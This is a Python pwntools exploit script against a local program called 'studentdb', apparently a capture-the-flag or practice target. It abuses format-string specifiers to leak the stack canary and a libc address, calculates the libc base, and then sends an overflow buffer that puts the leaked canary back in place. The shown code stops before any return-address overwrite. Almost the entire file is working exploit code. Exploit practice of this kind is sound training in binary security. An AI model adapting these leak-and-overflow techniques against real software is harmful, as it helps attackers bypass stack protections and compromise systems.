from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
target = process("./studentdb")

gdbcommand = """
    break add_student
"""

gdb.attach(target, gdbscript=gdbcommand)


# calcualted offsets
libc_offset = 0x1e9000

# write primitive
def add_student(proc, choice, idx, name):
    # choice & indx & name
    print("[+] Adding Student...")
    proc.sendline(str(choice).encode()) # making choice
    proc.recvuntil(b"name:")
    proc.sendline(str(idx).encode()) # selcting index
    proc.recvuntil(b"Enter student name:")
    proc.sendline(name) # sending name


# read primitive
def read_student_name(proc, choice, idx):
    print("[+] Read from database")
    proc.sendline(str(choice).encode())
    proc.recvuntil(b"student name:")
    proc.sendline(str(idx).encode())
    return target.recvuntil(b"\n\n").decode().split("\n")[:-2][2]

def recv_until_choice():
    target.recvuntil(b"choice:")

def convert_bytes_to_int(value):
    return int(value, 16)

# add_student(target, 1, 0, "John")
# target.recvuntil(b"choice:")
# read_student_name(target, 2, 0)

# leaking canary
add_student(target, 1, 0, "%63$p".encode())
recv_until_choice()
stack_canary = read_student_name(target, 2, 0)
print("[+] Stack Canary:", stack_canary)


# libc addres
add_student(target, 1, 0, "%4$p".encode())
recv_until_choice()
arb_libc_address = read_student_name(target, 2, 0)
print("[+] Leaked Libc Address:", arb_libc_address)
libc_base = convert_bytes_to_int(arb_libc_address)-libc_offset
print("[+] Calculated Libc Base:", hex(libc_base))





# overflow
buf = b""
buf += b"A" * 0x40
buf += struct.pack("I", convert_bytes_to_int(stack_canary))
buf += b"B" * (0x10-0x4)
print(buf)
add_student(target, 1, 0, buf)

# print(target.recv_raw(0x100))
target.interactive()


